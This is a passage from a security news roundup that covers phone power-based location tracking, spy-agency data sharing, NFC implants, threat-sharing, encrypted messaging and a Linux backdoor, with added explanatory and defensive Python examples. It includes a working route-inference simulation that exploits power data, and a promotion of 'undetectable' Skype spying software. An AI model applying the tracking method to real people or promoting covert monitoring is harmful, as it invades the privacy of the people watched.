Activity such as listening to music, activating maps, taking voice calls or using social media all drains the battery, but this can be discounted through "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise."

The tests were carried out on phones using the 3G network but did not measure signal strength, as that data is protected by the device.

'Stuffed with sensors'

"With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. "I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras. This latest work shows that even a basic characteristic (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that."

Source
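To make the "noise is not correlated with location" argument concrete, here is an added example (not the Stanford/Rafael authors' code) that does the matching step on constructed, synthetic data: each known route has a power profile over time, an observed trace is that profile resampled at a different speed with jitter and random high-power bursts standing in for calls, music or app activity, and the route is inferred by dynamic time warping against every profile after removing the mean. The route profiles, the noise model and the power values are invented for the demonstration, not measured on a phone.

```python
"""Route inference from aggregate power draw on constructed data.
Added example, not the study authors' code; profiles and noise are invented."""
import math
import random


def dtw_distance(a, b):
    """Dynamic time warping distance, so a trace recorded at a different
    driving speed still lines up with its route profile."""
    n, m = len(a), len(b)
    cost = [[math.inf] * (m + 1) for _ in range(n + 1)]
    cost[0][0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            d = abs(a[i - 1] - b[j - 1])
            cost[i][j] = d + min(cost[i - 1][j], cost[i][j - 1], cost[i - 1][j - 1])
    return cost[n][m]


def normalise(trace):
    """Subtract the mean so a constant background load (screen, CPU) or a
    uniform rate of bursts does not bias the match; only the shape matters."""
    mean = sum(trace) / len(trace)
    return [x - mean for x in trace]


def classify_route(trace, profiles):
    """Return (best_route, distances): the profile with the smallest DTW
    distance to the normalised trace is the inferred route."""
    t = normalise(trace)
    distances = {name: dtw_distance(t, normalise(p)) for name, p in profiles.items()}
    return min(distances, key=distances.get), distances


# Constructed route profiles: modem power (mW) per sample. Route A moves away
# from towers and back (power rises then falls), route B is its mirror image,
# route C stays close to towers with only mild variation.
ROUTE_PROFILES = {
    "A_highway_north": [300 + 150 * math.sin(math.pi * i / 60) for i in range(60)],
    "B_downtown_loop": [450 - 150 * math.sin(math.pi * i / 60) for i in range(60)],
    "C_flat_rural": [400 + 20 * math.sin(2 * math.pi * i / 15) for i in range(60)],
}


def simulate_trace(profile, seed, speed=1.0, burst_mw=150, burst_rate=0.10):
    """Constructed 'measurement' of a drive along `profile`: resampled at a
    different speed, with Gaussian jitter and occasional high-power bursts
    standing in for calls, music or app activity (noise uncorrelated with
    location). Only this aggregate total is what a power API would expose."""
    rng = random.Random(seed)
    n = int(len(profile) / speed)
    trace = []
    for k in range(n):
        x = profile[min(int(k * speed), len(profile) - 1)]
        x += rng.gauss(0, 10)
        if rng.random() < burst_rate:
            x += burst_mw
        trace.append(x)
    return trace


if __name__ == "__main__":
    for route in ROUTE_PROFILES:
        observed = simulate_trace(ROUTE_PROFILES[route], seed=3, speed=1.2)
        guess, dists = classify_route(observed, ROUTE_PROFILES)
        print(f"true={route:16s} inferred={guess:16s} "
              + ", ".join(f"{k}={v:.0f}" for k, v in dists.items()))
```

The bursts are not removed individually; they simply fail to line up with any route's shape, which is why the correct profile still wins once the trace is long enough. The same reasoning explains why the paper needs several minutes of samples rather than a single reading.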
19. Skype Spy USB Edition software allows you to monitor and track all Skype chats and activities, such as file transfers or calls. You can search the monitored Skype data, make copies of it, and restore it as well. Best of all, Skype Spy USB Edition is portable: you can run it from a USB flash drive and use it on any computer without installation. In this way the app stays completely undetectable. It is a great option for anyone looking for an effective parental control solution or employee monitoring software.

Free Skype Spy USB Edition (100% discount)

Four more days until it expires.
20. Privacy International (PI) is calling on people to sign up to be part of a mass request for confirmation that they have been spied on by Five Eyes spy agencies, and to demand the removal of captured information.

Would-be signatories are being asked to submit their name and email address to the organisation, which will then pass them on to Britain's Investigatory Powers Tribunal, the body tasked with determining whether the sharing of NSA-intercepted material with the UK's GCHQ spy agency was illegal. The requests would cover a prodigious amount of data, billions of records hoovered up by the NSA and shared with GCHQ until December last year. PI will not reveal whether agencies other than the NSA collected data, and the requests would cover only data shipped to GCHQ. This could conceivably include data captured by any Five Eyes agency and shared with GCHQ via the NSA.

The offer came on the heels of the tribunal's ruling this month in favour of Privacy International that the mass funnelling of intelligence information between Britain and the United States was illegal prior to December. That decision, made on the grounds that the rules governing the exchange were secret, opened an avenue for users to ask the tribunal to examine whether their data was illegally obtained, to notify them, and, if a breach is found, to have the information destroyed.

The British charity dubbed the ruling a "major victory against the Five Eyes" group of nations, which includes Australia, New Zealand and Canada, and said it was possible only due to the flurry of NSA leaks from Edward Snowden.

"Through their secret intelligence sharing relationship with the NSA, GCHQ has had intermittently unrestricted access to PRISM - NSA's means of directly accessing data and content handled by some of the world's largest Internet companies, including Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube and Apple," deputy director Eric King said at the time. "GCHQ's access to NSA material therefore makes up the large bulk of all surveillance material handled by the security services; some ex-GCHQ staffers estimated that 95 per cent of all signals intelligence material handled at GCHQ is American. The extraordinary implication of [the] judgement is that all historical sharing of raw intelligence between NSA and GCHQ took place without an adequate legal framework, and thus was unlawful."

The Tribunal will likely be swamped if the campaign takes off. Probes could trawl records collected from the NSA programmes UPSTREAM, CO-TRAVELLER and DISHFIRE, the first of which intercepted some 160 billion records from its top five programmes in one month alone. Privacy International said requests could take years to be fulfilled.

New requests could be made to discover the data collected by individual agencies up to the present day if the charity succeeds in its appeal to the European Court of Human Rights against the finding that the data shared between the US and UK spy agencies became kosher once the policies of the arrangement were made public as a result of the legal action.

Source
21. CANCUN – Hannes Sjoblad of the Swedish Biohacking Association throws a mean implant party, the latest of which was held today on stage at the Security Analyst Summit. Kaspersky Lab researcher Povel Torudd bravely volunteered to have an NFC implant the size of a grain of rice injected into the skin between his thumb and forefinger.

The chips can be used for a variety of purposes, including as a second form of authentication or for tracking healthcare information, and people such as Sjoblad believe implants can soon supplant things such as car keys, proximity cards and other authenticators, while also introducing additional risk to users' physical well-being and privacy.

"These implants have the potential to be used for digital logins, storage of public encryption keys, and perhaps replace all silly passwords that don't work," Sjoblad said. "This technology has the potential for solving these issues."

Data stored on the tiny chip can be read by a mobile app. Sjoblad, for example, has also set up in his chip rebate memberships for retailers where he shops in Sweden, his business cards, gym membership cards and more. "It's made my life easier and interesting," he said.

From a security perspective, however, implanting a tracking technology introduces physical risk to the wearer. Already, with existing human implant technology such as insulin pumps, pacemakers and cochlear implants, there are risks that they can be remotely accessed, putting private data at risk. Complicating matters is the introduction of health care data into the equation. For example, health care monitors track volumes of personal data over periods of time, trending data that could be of value if exposed, not to mention a detriment to the user's privacy.

Sjoblad slots usage of implanted NFC chips into a pair of categories: identification and information storage. The chips can be used to identify and authenticate the user for building entry or transaction verification, or use stored data for personalization, in a car for example, to adjust seat and mirror settings automatically for the particular user.

The saving grace for security may be the potential for this technology to replace passwords, a long reviled means of authentication that is simply bypassed, onerous to manage and a general failure given the recent litany of breaches. "Passwords are not human friendly," Sjoblad said.

Source
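What a reader actually gets back from a tag like this is an NDEF message, and the privacy point of the article is easier to judge when you see how little stands between that message and anyone with a phone. The following is an added example, not Sjoblad's or Kaspersky's code: a parser for the NFC Forum NDEF record layout (flags byte, type length, payload length, optional id length, type, id, payload) covering the two well-known record types "U" (URI, with its one-byte prefix abbreviation) and "T" (text, with a status byte and language code). The tag contents are constructed here to resemble the business card and membership data mentioned above.

```python
"""Decode an NDEF message as read from an NFC tag. Added example, not the
article's or any vendor's code; the tag contents below are constructed."""

URI_PREFIXES = {0x00: "", 0x01: "http://www.", 0x02: "https://www.",
                0x03: "http://", 0x04: "https://", 0x05: "tel:", 0x06: "mailto:"}
TNF_WELL_KNOWN = 0x01


def parse_ndef(data):
    """Return a list of records (tnf, type, id, payload, decoded value),
    stopping at the record whose ME flag marks the end of the message."""
    records, pos = [], 0
    while pos < len(data):
        flags = data[pos]; pos += 1
        short_record, has_id = flags & 0x10, flags & 0x08
        tnf = flags & 0x07
        type_len = data[pos]; pos += 1
        if short_record:
            payload_len = data[pos]; pos += 1
        else:
            payload_len = int.from_bytes(data[pos:pos + 4], "big"); pos += 4
        id_len = 0
        if has_id:
            id_len = data[pos]; pos += 1
        rtype = data[pos:pos + type_len]; pos += type_len
        rid = data[pos:pos + id_len]; pos += id_len
        payload = data[pos:pos + payload_len]; pos += payload_len
        if len(payload) != payload_len:
            raise ValueError("truncated NDEF record")
        rec = {"tnf": tnf, "type": rtype, "id": rid, "payload": payload, "value": None}
        if tnf == TNF_WELL_KNOWN and rtype == b"U" and payload:
            # first payload byte abbreviates a common scheme prefix
            rec["value"] = URI_PREFIXES.get(payload[0], "") + payload[1:].decode("utf-8")
        elif tnf == TNF_WELL_KNOWN and rtype == b"T" and payload:
            status = payload[0]                    # bit 7: UTF-16, low 6 bits: lang length
            lang_len = status & 0x3F
            encoding = "utf-16" if status & 0x80 else "utf-8"
            rec["lang"] = payload[1:1 + lang_len].decode("ascii")
            rec["value"] = payload[1 + lang_len:].decode(encoding)
        records.append(rec)
        if flags & 0x40:                           # ME: message end
            break
    return records


def build_record(rtype, payload, first, last):
    """Construct a short (SR) well-known record; used to build the sample tag."""
    flags = 0x10 | TNF_WELL_KNOWN | (0x80 if first else 0) | (0x40 if last else 0)
    return bytes([flags, len(rtype), len(payload)]) + rtype + payload


# Constructed tag content: a business-card URL and a membership note.
SAMPLE_TAG = (build_record(b"U", b"\x04example.com/card/hannes", True, False)
              + build_record(b"T", b"\x02en" + b"Gym member 0042", False, True))


if __name__ == "__main__":
    for rec in parse_ndef(SAMPLE_TAG):
        print(rec["type"].decode(), rec.get("lang", ""), rec["value"])
```

Nothing in this exchange authenticates the reader: any NFC reader in range receives the same records, and a static UID or NDEF payload can be copied to another tag. For the "identification" category (building entry, transaction verification) the chip therefore needs to answer a challenge with a key that never leaves it, rather than present stored data; the "information storage" category should hold only what the wearer is happy to hand to a stranger.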
22. After weeks of mounting pressure from national governments for increased access to personal data following the Charlie Hebdo attack, the European Parliament has pulled a switch that aims to simultaneously increase citizens' privacy rights while also giving law enforcement agencies more ability to track travellers.

As they twist and turn like a twisty turny thing, MEPs are essentially leveraging national governments' desire for a PNR (Passenger Name Record) tracking system to get the draft Data Protection Regulation approved. In a resolution approved by 532 votes to 136, with 36 abstentions, lawmakers demanded that member states make faster progress on the new data protection laws "so that talks could proceed in parallel with those on an EU Passenger Name Record proposal". In other words, give us what we want and we might relent in our opposition to PNR. MEPs said they would work "towards the finalisation of an EU PNR directive by the end of the year".

However, Jan Philipp Albrecht, the German MEP who has successfully steered the Data Protection Regulation this far, was against the move, believing that PNR should not be negotiated on any terms. He points to the ruling by the European Court of Justice last year which annulled the Data Retention Directive on the grounds that indiscriminate, blanket data retention is illegal. There are concerns from some MEPs that PNR, which the Parliament has rejected in the past, is exactly the sort of blanket information gathering that the ECJ blocked.

The PNR proposal would involve gathering all the information collected by airlines about passengers, including sensitive and personal information such as email addresses, credit card details, phone numbers and meal choices (halal, kosher, etc). Even Birgit Sippel, an MEP who voted in favour of the resolution, admitted that "the current draft EU PNR proposal needs to be revised to comply with the ECJ judgement on the Data Retention Directive".

The Parliament also proposes other steps, such as investment in educational and social schemes that address the root causes of radicalisation, "disengagement and de-radicalisation" programmes and increased information sharing. "Member states should improve the exchange of information between law enforcement authorities and EU agencies. Only 50 per cent of information regarding terrorism and organised crime is currently given by member states to Europol and Eurojust," the Parliament statement highlights.

Source
23. Facebook, with its giant infrastructure and an equally wide view into Internet attacks, has built an information-sharing platform that it hopes will entice other big technology companies to join and contribute threat data and indicators of compromise. The platform, called ThreatExchange, already counts Pinterest, Yahoo, Tumblr, Twitter, Bitly and Dropbox among its early members. It is free, and most of the heavy lifting is done by Facebook's inf­rastructure.

The platform developers were also cognizant of some of the concerns enterprises have about sharing threat data, from both a competitive and a risk management standpoint. Privacy controls built into ThreatExchange not only sanitize information provided by members but also allow contributors to share data with all of the exchange's members or only with particular subsets.

In addition to threat information shared by contributors, open source threat intelligence feeds are pulled into the platform. Mark Hammell, manager of Facebook's threat infrastructure team, would not identify any of the open source feeds until some legal details are worked out. Facebook will homogenize all of those feeds' data formats and make them consumable via ThreatExchange. "We're able to leverage a huge community doing security research independently and give them a platform," Hammell said.

Hammell said he hopes the initial partner list grows to include other technology companies with a large Internet footprint. Microsoft, for example, has developed its own information sharing platform called Interflow, while the FBI announced last winter that it was releasing an unclassified version of its malware repository in the hope of spurring public-private sharing of threat data.

"If some reasonably large Internet properties cooperate on attacks they've seen and responded to, the vast majority of the Internet will be safer," Hammell said. "We want to bring in more companies like that and eventually broaden it beyond big companies to smaller web properties and researchers. We want to create a forum where we can share attack and threat information in an easy way and share it with as many who want to receive it.

"We realize that any problem that affects the Internet affects our products in lockstep," Hammell said. "The corollary there is that the more we can do to take on larger problems the Internet is facing, the better our products will be and the safer the Internet will be."

ThreatExchange is an API-based exchange; IT admins will be able to consume threat data via the APIs and write signatures and other protections accordingly. Participants can share threat data such as malware samples, lists of malicious URLs and other indicators of compromise that make sense. While participants will be able to see the data, they will not be able to tell where it is coming from, though everyone will have access to the list of members. "You can see URLs that are known as bad, or metadata, but you cannot tell where it's coming from; there is no attribution in the data," Hammell said.

Privacy controls within the framework allow contributors to publish breach data such as domains used in an attack or malware hashes and select who sees it. Facebook said there is one added use case where a contributor is allowed to select only specific other organizations to share data with. "The classic example is an attack you're investigating where only you and a few companies are targeted," Hammell explained. "They can collaborate together on that particular attack and share data, but perhaps they don't feel it's appropriate to go wider because it may tip their hand and alert the attacker, or it would not be beneficial to the investigation if others started poking at the infrastructure and possibly disrupt the work they're doing. It's an important scenario to get right."

Hammell added that the platform is free, and the intent is for it to stay that way. "We want the platform to be a medium to share what people want to share," he said.

Source
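The sharing rules described above (heterogeneous feeds normalised to one shape, per-record visibility of "everyone" or a chosen subset, a member roster that is public, and no attribution on the consumer side) are small enough to model end to end. The following is an added example and not Facebook's code or API: the feed formats, member names and indicators are constructed, and the visibility logic is one way to implement what the article describes, not ThreatExchange's actual implementation.

```python
"""Working model of the ThreatExchange sharing rules described in the article.
Added example, not Facebook's code; feeds, members and indicators are constructed."""
import csv
import io
import json


class Exchange:
    def __init__(self, members):
        self.members = set(members)      # the roster everyone can see
        self._records = []               # (contributor, visible_to, indicator)

    def publish(self, contributor, indicator, visible_to=None):
        """Share an indicator with every member (default) or only a subset;
        the contributor always keeps visibility of its own record."""
        if contributor not in self.members:
            raise PermissionError(f"{contributor} is not a member")
        vis = set(self.members) if visible_to is None else set(visible_to) | {contributor}
        unknown = vis - self.members
        if unknown:
            raise ValueError(f"unknown members: {sorted(unknown)}")
        self._records.append((contributor, frozenset(vis), dict(indicator)))

    def query(self, member, kind=None):
        """Indicators this member may see, stripped of any attribution field."""
        if member not in self.members:
            raise PermissionError(f"{member} is not a member")
        out = []
        for _contributor, vis, ind in self._records:
            if member in vis and (kind is None or ind["kind"] == kind):
                out.append({k: v for k, v in ind.items() if k != "source"})
        return out


def normalise_csv_feed(text):
    """Constructed open-source feed A: CSV with columns type,value,confidence."""
    out = []
    for row in csv.DictReader(io.StringIO(text)):
        out.append({"kind": row["type"].strip().lower(),
                    "value": row["value"].strip().lower(),
                    "confidence": int(row["confidence"])})
    return out


def normalise_json_feed(text):
    """Constructed open-source feed B: JSON list with category/ioc/score."""
    kinds = {"hash-sha256": "sha256", "domain-name": "domain", "url": "url"}
    return [{"kind": kinds[item["category"]],
             "value": item["ioc"].strip().lower(),
             "confidence": int(item.get("score", 50))}
            for item in json.loads(text)]


FEED_A = ("type,value,confidence\n"
          "Domain,Malicious-Updates.example,80\n"
          "SHA256,9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08,95\n")
FEED_B = json.dumps([{"category": "url", "ioc": "http://bad.example/x.php", "score": 70},
                     {"category": "domain-name", "ioc": "Drop.bad.example"}])


def build_sample_exchange():
    """Populate an exchange with the two open feeds plus one targeted share."""
    ex = Exchange(["facebook", "pinterest", "yahoo", "dropbox"])
    for ind in normalise_csv_feed(FEED_A) + normalise_json_feed(FEED_B):
        ex.publish("facebook", ind)                        # open feeds: everyone
    # A campaign only two members are investigating: shared with dropbox alone,
    # so wider poking at the infrastructure does not tip off the attacker.
    ex.publish("yahoo", {"kind": "domain", "value": "c2.campaign.example",
                         "confidence": 60, "source": "yahoo-ir-case-17"},
               visible_to=["dropbox"])
    return ex


if __name__ == "__main__":
    ex = build_sample_exchange()
    for member in sorted(ex.members):
        print(member, "sees", [r["value"] for r in ex.query(member)])
```

The one design decision worth calling out is that attribution is removed at read time rather than at write time: the exchange still knows who contributed what (it has to, to honour the visibility set), and the "no attribution in the data" promise rests on that record never being exposed through the query path.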
24. One of the most frequently used functions of smartphones is messaging. Private communication must remain private, and business communication must not, under any circumstances, be intercepted; under this motto G DATA presents its new Secure Messaging application at Mobile World Congress 2015 in Barcelona. G DATA SECURE CHAT offers strong security, multiply encrypted text and chat communication, and also guarantees the secure transfer of media files, for example photos. G DATA relies on the secure Axolotl protocol, which originated with TextSecure and already has more than 10 million users worldwide.

G DATA is also presenting other highlights in Barcelona: INTERNET SECURITY for Android and Mobile Device Management. Companies can keep their smartphones and tablets safe anywhere in the world thanks to the "Made in Germany" mobile security solution. G DATA will exhibit at Mobile World Congress 2015 in Barcelona in Hall 6, Stand 6B40, from 2 to 5 March 2015.

"Protecting mobile communications and integrating mobile devices into company-level security concepts are becoming increasingly important for businesses. G DATA positions itself as a technology leader in this sector and as a provider of complete IT security solutions," says Walter Schumann, CSO of G DATA Software AG. "Protecting messages, data and voice communications against cyber attackers, unauthorised data theft and spyware attacks is the major challenge of the future. With SECURE CHAT we offer smartphone and tablet users an easy-to-use application that encrypts mobile messaging extremely efficiently and thus offers effective protection against third-party access."

A free version of G DATA SECURE CHAT, with full text encryption, chat and image-sending capabilities, will be available on the G DATA website and in the Google Play Store from April 2015.

Communicate securely, without restrictions

The Axolotl protocol lets users communicate with a high level of encryption regardless of the messaging application used. Thanks to its elliptic-curve-based encryption, the protocol is internationally regarded as extremely secure, practically unbreakable. The only condition is to use an application that implements the protocol, such as G DATA SECURE CHAT or TextSecure from Open Whisper Systems.

G DATA SECURE CHAT in brief:
- Secure end-to-end encryption for individual and group chat
- A fast, simple and above all secure way to send images and photos using cryptography
- Backup of the history to the SD card
- Password encryption of the history

Premium version features (a G DATA INTERNET SECURITY FOR ANDROID licence is required):
- Anti-phishing filter for URLs in chat messages
- Filter for incoming and outgoing messages and for SMS
- Ability to hide selected contacts via SMS

TRUST IN GERMAN SICHERHEIT

G DATA at Mobile World Congress 2015: Hall 6, Stand 6B40

Source: MWC 2015: G DATA launches an impenetrable mobile messaging service
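"Practically unbreakable" is marketing; what Axolotl (today called the Double Ratchet, the protocol behind TextSecure and its successor Signal) actually buys is forward secrecy at message granularity, and that comes from the symmetric-key ratchet shown here. The following is an added example, not G DATA's or Open Whisper Systems' code: each message key is derived from a chain key that is then advanced and discarded, so a chain key captured today cannot recover keys for messages already sent. The example omits the Diffie-Hellman ratchet that periodically refreshes chain keys with elliptic-curve key exchange, uses a constant root chain key shared out-of-band for the demonstration, and replaces the real AES-based encryption with a SHA-256 counter-mode keystream, which is a stand-in and not what the protocol specifies.

```python
"""Symmetric-key ratchet of the Axolotl / Double Ratchet protocol.
Added example, not G DATA's or Open Whisper Systems' code; the cipher is a
SHA-256 keystream stand-in and the root chain key is a demo constant."""
import hashlib
import hmac


def kdf_ck(chain_key):
    """One ratchet step with the Double Ratchet constants: message key =
    HMAC(ck, 0x01), next chain key = HMAC(ck, 0x02). HMAC is one-way, so the
    previous chain key cannot be computed from the next one."""
    message_key = hmac.new(chain_key, b"\x01", hashlib.sha256).digest()
    next_chain_key = hmac.new(chain_key, b"\x02", hashlib.sha256).digest()
    return next_chain_key, message_key


def _keystream(key, nonce, length):
    """Stand-in for the real cipher: SHA-256 in counter mode (demo only)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def _split(message_key):
    enc_key = hmac.new(message_key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(message_key, b"mac", hashlib.sha256).digest()
    return enc_key, mac_key


def seal(message_key, counter, plaintext):
    """counter || ciphertext || HMAC tag. The counter tells the receiver how
    far to ratchet and is authenticated, so it cannot be moved or replayed."""
    enc_key, mac_key = _split(message_key)
    nonce = counter.to_bytes(4, "big")
    body = bytes(a ^ b for a, b in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def unseal(message_key, blob):
    enc_key, mac_key = _split(message_key)
    nonce, body, tag = blob[:4], blob[4:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + body, hashlib.sha256).digest()):
        raise ValueError("authentication failed: wrong key or tampered message")
    return bytes(a ^ b for a, b in zip(body, _keystream(enc_key, nonce, len(body))))


class SendingChain:
    def __init__(self, chain_key):
        self.ck, self.n = chain_key, 0

    def encrypt(self, plaintext):
        self.ck, mk = kdf_ck(self.ck)       # the old chain key is gone after this
        blob = seal(mk, self.n, plaintext)
        self.n += 1
        return blob


class ReceivingChain:
    """Parks message keys for skipped counters so out-of-order delivery still
    decrypts, but never keeps a chain key it has stepped past."""
    def __init__(self, chain_key, start=0):
        self.ck, self.n, self.skipped = chain_key, start, {}

    def decrypt(self, blob):
        counter = int.from_bytes(blob[:4], "big")
        if counter in self.skipped:
            return unseal(self.skipped.pop(counter), blob)
        if counter < self.n:
            raise ValueError("message key already used and deleted")
        while self.n < counter:             # derive and park keys for skipped messages
            self.ck, mk = kdf_ck(self.ck)
            self.skipped[self.n] = mk
            self.n += 1
        self.ck, mk = kdf_ck(self.ck)
        self.n += 1
        return unseal(mk, blob)


def can_decrypt_with(stolen_chain_key, stolen_counter, blob):
    """What an attacker holding a receiver's current (chain key, counter) can
    do with a ciphertext: False means the derived key does not authenticate."""
    try:
        ReceivingChain(stolen_chain_key, stolen_counter).decrypt(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    root = kdf_ck(b"constructed shared secret (demo only)")[0]
    alice, bob = SendingChain(root), ReceivingChain(root)
    msgs = [alice.encrypt(m) for m in (b"one", b"two", b"three")]
    print(bob.decrypt(msgs[0]), bob.decrypt(msgs[2]), bob.decrypt(msgs[1]))
    print("stolen state reads message 1:", can_decrypt_with(bob.ck, bob.n, msgs[0]))
    print("stolen state reads message 4:", can_decrypt_with(bob.ck, bob.n, alice.encrypt(b"four")))
```

The second print shows the limit of the symmetric ratchet: a stolen chain key does protect everything sent before the theft, but it lets the attacker derive every key that comes after it. Closing that gap is the job of the Diffie-Hellman ratchet this example leaves out, which mixes a fresh elliptic-curve shared secret into the chain keys whenever the other party replies.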
  25. Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. 
If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself. The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives which can include:
List files and directories inside the specified directory.
Send directory size data to the server.
Create a file in which received data can be stored.
Accept a file.
Send a file to the command and control (C&C) server.
Delete a file.
Delete a directory.
Signal the server that it is ready to accept a file.
Create a directory.
Rename a file.
Run a file.
In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source
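As an added defender-side example (not from the Doctor Web write-up or this post), a small Python hunt for the two persistence artifacts the post describes: the dropped /bin/iptable6 copy and an /etc/init.d script whose first line is #!/bin/bash and which has had a launch line injected. The post does not say what the injected line looks like; the assumption that it references the dropped binary is mine, and the sample snapshot is constructed.

```python
import os

# Artifacts named in the write-up.
DROPPED_BINARY = "/bin/iptable6"
INIT_DIR = "/etc/init.d"
BASH_SHEBANG = "#!/bin/bash"

def find_xnote_indicators(files):
    """Scan a {path: text-or-None} snapshot; return (path, reason) findings."""
    findings = []
    if DROPPED_BINARY in files:
        findings.append((DROPPED_BINARY, "dropped backdoor copy present"))
    for path, text in files.items():
        if os.path.dirname(path) != INIT_DIR or text is None:
            continue
        lines = text.splitlines()
        # The backdoor only edits init scripts whose first line is "#!/bin/bash".
        if not lines or lines[0].strip() != BASH_SHEBANG:
            continue
        # Assumption (not stated in the post): the injected line names the dropped binary.
        for n, line in enumerate(lines[1:], start=2):
            if "iptable6" in line:
                findings.append((path, f"line {n} references iptable6: {line.strip()}"))
    return findings

def snapshot_filesystem(root="/"):
    """Read the two locations the backdoor touches from a live (or mounted) system."""
    files = {}
    if os.path.exists(os.path.join(root, DROPPED_BINARY.lstrip("/"))):
        files[DROPPED_BINARY] = None
    init_dir = os.path.join(root, INIT_DIR.lstrip("/"))
    for name in os.listdir(init_dir) if os.path.isdir(init_dir) else []:
        full = os.path.join(init_dir, name)
        if os.path.isfile(full):
            with open(full, errors="replace") as fh:
                files[os.path.join(INIT_DIR, name)] = fh.read()
    return files

# Constructed sample snapshot: a clean sh script, a tampered bash script, the dropped copy.
SAMPLE_FS = {
    "/bin/iptable6": None,
    "/etc/init.d/ssh": "#!/bin/sh\nexec /usr/sbin/sshd\n",
    "/etc/init.d/networking": "#!/bin/bash\n### BEGIN INIT INFO\n/bin/iptable6 &\nifup -a\n",
}

if __name__ == "__main__":
    for path, reason in find_xnote_indicators(SAMPLE_FS):
        print(f"[!] {path}: {reason}")
```

On a real host, pass `snapshot_filesystem("/")` (or the mount point of a forensic image) to `find_xnote_indicators` instead of the constructed sample.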